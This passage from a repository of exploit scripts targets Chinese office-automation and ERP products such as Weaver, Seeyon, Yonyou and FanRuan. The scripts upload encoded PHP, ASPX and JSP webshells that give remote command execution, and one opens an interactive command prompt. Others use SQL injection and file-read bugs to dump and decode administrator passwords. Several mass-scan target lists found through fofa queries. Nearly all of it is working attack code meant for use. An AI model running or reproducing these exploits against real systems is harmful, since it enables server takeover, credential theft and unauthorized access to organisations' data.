base64.b64decode("Q29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5ZmNLUmx0R3YKCi0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeWZjS1JsdEd2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZSI7IGZpbGVuYW1lPSJjb25maWcucGhwIgpDb250ZW50LVR5cGU6IGltYWdlL2F2aWYKCjw/cGhwCkBlcnJvcl9yZXBvcnRpbmcoMCk7CnNlc3Npb25fc3RhcnQoKTsKCWVjaG8gIm5vX3NoZWxsIjsKICAgICRrZXk9ImU0NWUzMjlmZWI1ZDkyNWIiOwoJJF9TRVNTSU9OWydrJ109JGtleTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/PgoKLS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5ZmNLUmx0R3YtLQ==") 22 | try: 23 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 24 | response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5) 25 | if "Requst" in response.text and response.status_code == 200: 26 | webshell_url = target_url + "/Upload/test/config.php" 27 | response = requests.get(url=webshell_url, headers=headers,verify=False, timeout=5) 28 | if "shell" in response.text and response.status_code == 200: 29 | print("\033[32m[o] 目标 {}存在漏洞 ,成功上传冰蝎木马 config.php\n[o] 路径为 {}/Upload/test/config.php\033[0m".format(target_url, target_url)) 30 | print("\033[32m[o] 密码为: rebeyond \033[0m") 31 | else: 32 | print("\033[31m[x] 请求失败 \033[0m") 33 | sys.exit(0) 34 | else: 35 | print("\033[31m[x] 上传失败 \033[0m") 36 | except Exception as e: 37 | print("\033[31m[x] 请求失败 \033[0m", e) 38 | 39 | 40 | if __name__ == '__main__': 41 | title() 42 | target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) 43 | POC_1(target_url) 44 | -------------------------------------------------------------------------------- /泛微OA/ecology_test/ecology_sql.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | 6 | print ''' 7 | ---------------------------------------- 8 | Ecology_SQL test script by LuckyEast >_< 9 | ---------------------------------------- 10 | ''' 11 | 12 | headers = { 13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0', 14 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 15 | 'Accept-Language': 'zh-CN,zh;q=0.9', 16 | 'Content-Type': 'application/x-www-form-urlencoded' 17 | } 18 | 19 | def sql_test(url): 20 | vul_url = url + '/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333' 21 | poc = "formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1" 22 | rsp = requests.post(url=vul_url, data=poc, headers=headers, verify=False, timeout=10).text.strip() 23 | print rsp.encode('utf-8') 24 | 25 | if __name__ == "__main__": 26 | url = sys.argv[1] 27 | sql_test(url) 28 | -------------------------------------------------------------------------------- /智慧校园管理系统/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | import base64 6 | import time 7 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 8 | 9 | def title(): 10 | print('+------------------------------------------') 11 | print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') 12 | print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m') 13 | print('+ \033[34m公众号 : PeiQi文库 \033[0m') 14 | print('+ \033[34mVersion: 智慧校园管理系统 \033[0m') 15 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 16 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 17 | print('+------------------------------------------') 18 | 19 | def POC_1(target_url): 20 | vuln_url = target_url + "/DC_OA_WJG/Upload" 21 | headers = { 22 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 23 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryNxqOHxbHqt9mf7s5", 24 | } 25 | data = base64.b64decode("LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5TnhxT0h4YkhxdDltZjdzNQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVwRmlsZSI7IGZpbGVuYW1lPSJQZWlRaS5hc3B4IgpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQoKPHNjcmlwdCBsYW5ndWFnZT0iSlNjcmlwdCIgcnVuYXQ9InNlcnZlciI+ZnVuY3Rpb24gUGFnZV9Mb2FkKCl7ZXZhbChSZXF1ZXN0WyJQZWlRaSJdLCJ1bnNhZmUiKTt9PC9zY3JpcHQ+CgotLS0tLS1XZWJLaXRGb3JtQm91bmRhcnlOeHFPSHhiSHF0OW1mN3M1LS0=") 26 | try: 27 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 28 | response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5) 29 | print("\033[36m[o] 正在请求 {}/DC_OA_WJG/Upload 尝试上传木马..... \033[0m".format(target_url)) 30 | if 'true' in response.text and 'path' in response.text and response.status_code == 200: 31 | print("\033[32m[o] 目标 {} 成功上传 Webshell文件\033[0m".format(target_url)) 32 | webshell_path = re.findall(r'"path":"(.*?)"', response.text)[0] 33 | print("\033[32m[o] Webshell文件地址: {}/{} \033[0m".format(target_url, webshell_path)) 34 | while True: 35 | Cmd = str(input("\033[35mCmd >>> \033[0m")) 36 | cmd_url = target_url + "/" + webshell_path + "?PeiQi=Response.Write(new%20ActiveXObject(%22WSCRIPT.Shell%22).exec(%22cmd%20/c%20{}%22).StdOut.ReadAll());".format(Cmd) 37 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 38 | response = requests.get(url=cmd_url, data=data, headers=headers, verify=False, timeout=5) 39 | print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text)) 40 | else: 41 | print("\033[31m[x] 目标 {} 上传Webshell文件失败\033[0m".format(target_url)) 42 | sys.exit(0) 43 | 44 | except Exception as e: 45 | print("\033[31m[x] 请求失败 \033[0m", e) 46 | 47 | 48 | if __name__ == '__main__': 49 | title() 50 | target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) 51 | POC_1(target_url) 52 | -------------------------------------------------------------------------------- /帆软OA/帆软OA_V8_任意文件读取/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import re 4 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 5 | 6 | def title(): 7 | print('+------------------------------------------') 8 | print('+ \033[34mVersion: 帆软报表 v8.0 \033[0m') 9 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 10 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 11 | print('+------------------------------------------') 12 | 13 | def decode_passwd(cipher): 14 | PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] # 掩码 15 | Password = "" 16 | cipher = cipher[3:] # 截断三位后 17 | for i in range(int(len(cipher) / 4)): 18 | c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16) 19 | c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8] 20 | Password = Password + chr(c2) 21 | return Password 22 | 23 | def POC_1(target_url): 24 | vuln_url_1 = target_url + '/WebReport/ReportServer' 25 | vuln_url_2 = target_url + '/ReportServer' 26 | headers = { 27 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 28 | } 29 | try: 30 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 31 | response_1 = requests.get(url=vuln_url_1, timeout=5, verify=False, headers=headers) 32 | response_2 = requests.get(url=vuln_url_2, timeout=5, verify=False, headers=headers) 33 | if "部署页面" in response_1.text: 34 | print("\033[32m[o] 目标部署页面为: {} \033[0m".format(vuln_url_1)) 35 | POC_2(vuln_url_1) 36 | elif "部署页面" in response_2.text: 37 | print("\033[32m[o] 目标部署页面为: {} \033[0m".format(vuln_url_2)) 38 | POC_2(vuln_url_2) 39 | else: 40 | print("\033[31m[x] 目标漏洞无法利用 \033[0m") 41 | sys.exit(0) 42 | 43 | except Exception as e: 44 | print("\033[31m[x] 目标漏洞无法利用 {} \033[0m".format(e)) 45 | sys.exit(0) 46 | 47 | def POC_2(vuln_url_fileread): 48 | vuln_url = vuln_url_fileread + "?op=chart&cmd=get_geo_json&resourcepath=privilege.xml" 49 | try: 50 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 51 | response = requests.get(url=vuln_url, verify=False, timeout=5) 52 | print("\033[32m[o] 正在访问: {} \033[0m".format(vuln_url)) 53 | if "rootManagerPassword" in response.text and response.status_code == 200: 54 | print("\033[32m[o] 目标存在漏洞,读取敏感文件 \n{} \033[0m".format(response.text)) 55 | user_name = re.findall(r'<!\[CDATA\[(.*?)]]></rootManagerName>', response.text) 56 | cipher = re.findall(r'<!\[CDATA\[(.*?)]]></rootManagerPassword>', response.text) 57 | password = decode_passwd(cipher[0]) 58 | print("\033[34m[o] 后台账户密码为:{} {} \033[0m".format(user_name[0], password)) 59 | else: 60 | print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url)) 61 | except Exception as e: 62 | print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url)) 63 | 64 | if __name__ == '__main__': 65 | title() 66 | target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) 67 | POC_1(target_url) 68 | -------------------------------------------------------------------------------- /seeyon/致远OA组合getshell.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import time 3 | import requests 4 | import re 5 | import sys 6 | import random 7 | import zipfile 8 | 9 | 10 | la = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0', 11 | 'Content-Type': 'application/x-www-form-urlencoded'} 12 | 13 | def generate_random_str(randomlength=16): 14 | random_str = '' 15 | base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789' 16 | length = len(base_str) - 1 17 | for i in range(randomlength): 18 | random_str += base_str[random.randint(0, length)] 19 | return random_str 20 | 21 | mm = generate_random_str(8) 22 | 23 | webshell_name1 = mm+'.jsp' 24 | webshell_name2 = '../'+webshell_name1 25 | 26 | def file_zip(): 27 | shell = 'test' ## 替换shell内容 28 | zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED) 29 | zf.writestr('layout.xml', "") 30 | zf.writestr(webshell_name2, shell) 31 | 32 | 33 | def Seeyon_Getshell(urllist): 34 | 35 | url = urllist+'/seeyon/thirdpartyController.do' 36 | post = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" 37 | response = requests.post(url=url, data=post, headers=la) 38 | if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower(): 39 | cookie = response.cookies 40 | cookies = requests.utils.dict_from_cookiejar(cookie) 41 | jsessionid = cookies['JSESSIONID'] 42 | file_zip() 43 | print( '获取cookie成功---->> '+jsessionid) 44 | fileurl = urllist+'/seeyon/fileUpload.do?method=processUpload&maxSize=' 45 | headersfile = {'Cookie': "JSESSIONID=%s" % jsessionid} 46 | post = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver': "false", "type": '0', 47 | 'isEncrypt': "0"} 48 | file = [('file1', ('test.png', open(mm+'.zip', 'rb'), 'image/png'))] 49 | filego = requests.post(url=fileurl,data=post,files=file, headers=headersfile) 50 | time.sleep(2) 51 | else: 52 | print('获取cookie失败') 53 | exit() 54 | if filego.text: 55 | fileid1 = re.findall('fileurls=fileurls\+","\+\'(.+)\'', filego.text, re.I) 56 | fileid = fileid1[0] 57 | if len(fileid1) == 0: 58 | print('未获取到文件id可能上传失败!') 59 | print('上传成功文件id为---->>:'+fileid) 60 | Date_time = time.strftime('%Y-%m-%d') 61 | headersfile2 = {'Content-Type': 'application/x-www-form-urlencoded','Cookie': "JSESSIONID=%s" % jsessionid} 62 | getshellurl = urllist+'/seeyon/ajax.do' 63 | data = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + Date_time + '%22%2C%22' + fileid + '%22%5D' 64 | getshell = requests.post(url=getshellurl,data=data,headers=headersfile2) 65 | time.sleep(1) 66 | webshellurl1 = urllist + '/seeyon/common/designer/pageLayout/' + webshell_name1 67 | shelllist = requests.get(url=webshellurl1) 68 | if shelllist.status_code == 200: 69 | print('利用成功webshell地址:'+webshellurl1) 70 | else: 71 | print('未找到webshell利用失败') 72 | 73 | 74 | 75 | def main(): 76 | if (len(sys.argv) == 2): 77 | url = sys.argv[1] 78 | Seeyon_Getshell(url) 79 | else: 80 | print("python3 Seeyon_Getshell.py http://xx.xx.xx.xx") 81 | 82 | if __name__ == '__main__': 83 | main() 84 | -------------------------------------------------------------------------------- /seeyon/致远A8任意文件写入漏洞_getshell_exp/致远A8任意文件写入漏洞_getshell_exp.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import sys 3 | import requests 4 | 5 | def encode(origin_bytes): 6 | """ 7 | 重构 base64 编码函数 8 | """ 9 | # 将每一位bytes转换为二进制字符串 10 | base64_charset = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6" 11 | base64_bytes = ['{:0>8}'.format(bin(ord(b)).replace('0b', '')) for b in origin_bytes] 12 | 13 | resp = '' 14 | nums = len(base64_bytes) // 3 15 | remain = len(base64_bytes) % 3 16 | 17 | integral_part = base64_bytes[0:3 * nums] 18 | while integral_part: 19 | # 取三个字节,以每6比特,转换为4个整数 20 | tmp_unit = ''.join(integral_part[0:3]) 21 | tmp_unit = [int(tmp_unit[x: x + 6], 2) for x in [0, 6, 12, 18]] 22 | # 取对应base64字符 23 | resp += ''.join([base64_charset[i] for i in tmp_unit]) 24 | integral_part = integral_part[3:] 25 | 26 | if remain: 27 | # 补齐三个字节,每个字节补充 0000 0000 28 | remain_part = ''.join(base64_bytes[3 * nums:]) + (3 - remain) * '0' * 8 29 | # 取三个字节,以每6比特,转换为4个整数 30 | # 剩余1字节可构造2个base64字符,补充==;剩余2字节可构造3个base64字符,补充= 31 | tmp_unit = [int(remain_part[x: x + 6], 2) for x in [0, 6, 12, 18]][:remain + 1] 32 | resp += ''.join([base64_charset[i] for i in tmp_unit]) + (3 - remain) * '=' 33 | 34 | return resp 35 | def getshell(urls): 36 | url = urls + "/seeyon/htmlofficeservlet" 37 | headers = { 38 | "Pragma": "no-cache", 39 | "Cache-Control": "no-cache", 40 | "Upgrade-Insecure-Requests": "1", 41 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36", 42 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", 43 | "Accept-Language": "zh-CN,zh;q=0.9", 44 | "Connection": "close", 45 | } 46 | file_name = encode('..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\checkload32.jsp') 47 | payload = """DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV\r 48 | OPTION=S3WYOSWLBSGr\r 49 | currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r 50 | CREATEDATE=wUghPB3szB3Xwg66\r 51 | RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r 52 | originalFileId=wV66\r 53 | originalCreateDate=wUghPB3szB3Xwg66\r 54 | FILENAME="""+file_name+"""\r 55 | needReadFile=yRWZdAS6\r 56 | originalCreateDate=wLSGP4oEzLKAz4=iz=66\r 57 | <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("zs".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce""" 58 | requests.post(url=url,data=payload,headers=headers) 59 | result = requests.get(urls + "/seeyon/checkload32.jsp?pwd=zs&cmd=cmd+/c+echo+ZuoShou_Jsp_Shell") 60 | if 'ZuoShou_Jsp_Shell' in result.text : 61 | print(u'Jsp:Getshell成功\t{}'.format(urls + "/seeyon/checkload32.jsp?pwd=zs&cmd=cmd /c whoami")) 62 | else : 63 | print(u'Getshell失败') 64 | if __name__ == '__main__': 65 | if len(sys.argv)!=2 : 66 | print(u"\t\t用法:python poc.py 'http://loaclhost'") 67 | else: 68 | url = sys.argv[1] 69 | getshell(url) 70 | -------------------------------------------------------------------------------- /用友OA/用友ERP-NC_目录遍历/poc.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python3 2 | ''' 3 | fofa app="用友-UFIDA-NC" 4 | 仅供测试 5 | ''' 6 | import requests 7 | import time 8 | import random 9 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 10 | 11 | def title(): 12 | print('+------------------------------------------') 13 | print('+ \033[34mVersion: 用友ERP-NC 目录遍历漏洞 \033[0m') 14 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 15 | print('+ \033[36m文件名: url.txt \033[0m') 16 | print('+------------------------------------------') 17 | 18 | #随机ua 19 | def get_ua(): 20 | first_num = random.randint(55, 62) 21 | third_num = random.randint(0, 3200) 22 | fourth_num = random.randint(0, 140) 23 | os_type = [ 24 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 25 | '(Macintosh; Intel Mac OS X 10_12_6)' 26 | ] 27 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 28 | 29 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 30 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 31 | ) 32 | return ua 33 | 34 | def poc(url): 35 | target_url = url + "/NCFindWeb?service=IPreAlertConfigService&filename=" 36 | header = {"User-Agent": get_ua(),} 37 | try: 38 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 39 | response = requests.get(url=target_url, headers=header, verify=False, timeout=10) 40 | if response.status_code == 200: 41 | with open('success.txt', 'a', encoding='utf8') as vul: 42 | vul.write("{} \n".format(target_url)) 43 | print("\033[32m[+]目标 {} 存在用友ERP-NC 目录遍历漏洞 \033[0m".format(url)) 44 | else: 45 | print("\033[31m[x]目标 {} 不存在用友ERP-NC 目录遍历漏洞 \033[0m".format(url)) 46 | except Exception as e: 47 | print("\033[31m[x] "+url+" 请求失败 \033[0m".format(e)) 48 | 49 | def Scan(file_name): 50 | header={"User-Agent": get_ua(),} 51 | with open(file_name, "r", encoding='utf8') as scan_url: 52 | for url in scan_url: 53 | if url[:4] != "http": 54 | url = "http://" + url 55 | url = url.strip('\n') 56 | try: 57 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 58 | httpError = False 59 | try: 60 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 61 | except Exception as e: 62 | httpError = True 63 | if not httpError and req.status_code == 200: 64 | print("\033[32m[+]正在请求{}".format(url)) 65 | else: 66 | url = url.replace("http","https") 67 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 68 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 69 | if req.status_code == 200: 70 | print("\033[32m[+]正在请求{}".format(url)) 71 | else: 72 | pass 73 | except Exception as e: 74 | print("\033[31m[x] "+url+" 访问失败 \033[0m".format(e)) 75 | try: 76 | poc(url) 77 | 78 | except Exception as e: 79 | print("\033[31m[x] "+url+" 请求报错 \033[0m".format(e)) 80 | continue 81 | if __name__ == '__main__': 82 | title() 83 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 84 | Scan(file_name) -------------------------------------------------------------------------------- /泛微OA/泛微OA_V8_SQL注入/weaverSQL.py: -------------------------------------------------------------------------------- 1 | # 泛微OA V8 SQL注入获取管理员(sysadmin)MD5后的密码信息 2 | # fofa: app="泛微-协同办公OA" 3 | 4 | import requests 5 | import urllib3 6 | from multiprocessing import Pool 7 | urllib3.disable_warnings() 8 | 9 | def title(): 10 | print("[-------------------------------------------------]") 11 | print("[------------ 泛微OA V8 SQL注入 -----------]") 12 | print("[-------- usage:python3 weaverSQL.py ------]") 13 | print("[-------------------------------------------------]") 14 | 15 | headers = { 16 | 17 | "User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36" 18 | 19 | } 20 | 21 | def target_url(url): 22 | target_url = url + "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager" 23 | try: 24 | res = requests.get(url=target_url,headers=headers,verify=False,timeout=10) 25 | if res.status_code == 200: 26 | print(f"\033[32m[+]目标系统: {url} 存在SQL注入!\033[0m") 27 | print("\033[32m[+] 正在查询sysadmin密码信息.......\033[0m") 28 | print(f"\033[32m[+]用户: sysadmin 密码MD5: {res.text.strip()}\033[0m") 29 | print("[---------------------------------------------------------------------]") 30 | with open('result.txt', 'a', encoding='utf8') as re: 31 | re.write("目标 {} 存在SQL注入\n用户名: sysadmin 密码MD5:{}\n\n".format(target_url,res.text.strip())) 32 | else: 33 | print(f"\033[31m[x]目标系统: {url} 不存在SQL注入!\033[0m") 34 | print("[---------------------------------------------------------------------]") 35 | except Exception as e: 36 | print(f"\033[31m[x]目标系统: {url} 存在未知错误!\033[0m\n",e) 37 | print("[---------------------------------------------------------------------]") 38 | 39 | def Scan(file_name): 40 | pool = Pool(processes=10) 41 | with open(file_name, "r", encoding='utf8') as scan_url: 42 | for url in scan_url: 43 | if url[:4] != "http": 44 | url = "http://" + url 45 | url = url.strip('\n') 46 | pool.apply_async(target_url, args=(url,)) 47 | pool.close() 48 | pool.join() 49 | try: 50 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 51 | httpError = False 52 | try: 53 | req = requests.get(url=url,headers=headers,verify=False,timeout=10) 54 | except Exception as e: 55 | httpError = True 56 | if not httpError and req.status_code == 200: 57 | print("\033[32m[+] 正在请求{} \033[0m".format(url)) 58 | else: 59 | url = url.replace("http","https") 60 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 61 | req = requests.get(url=url, headers=headers, verify=False, timeout=10) 62 | if req.status_code == 200: 63 | print("\033[32m[+] 正在请求{} \033[0m".format(url)) 64 | else: 65 | pass 66 | except Exception as e: 67 | print("\033[31m[x]"+url+" 访问失败 \033[0m".format(e)) 68 | else: 69 | pass 70 | try: 71 | target_url(url) 72 | except Exception as e: 73 | print("\033[31m[x] "+url+" 请求报错 \033[0m".format(e)) 74 | continue 75 | 76 | 77 | 78 | pool.close() 79 | pool.join() 80 | if __name__ == "__main__": 81 | title() 82 | file_name = str(input("\033[35m请输入需要测试的文件名: \033[0m")) 83 | Scan(file_name) 84 | 85 | -------------------------------------------------------------------------------- /泛微OA/泛微OA_V9_任意文件上传/exp.py: -------------------------------------------------------------------------------- 1 | #encoding: utf-8 2 | import requests 3 | import sys 4 | from time import time 5 | import random 6 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 7 | 8 | def title(): 9 | print('+------------------------------------------') 10 | print('+ \033[34mVersion: 泛微OA V9 任意文件上传 \033[0m') 11 | print('+ \033[36m使用格式: python3 exp.py \033[0m') 12 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 13 | 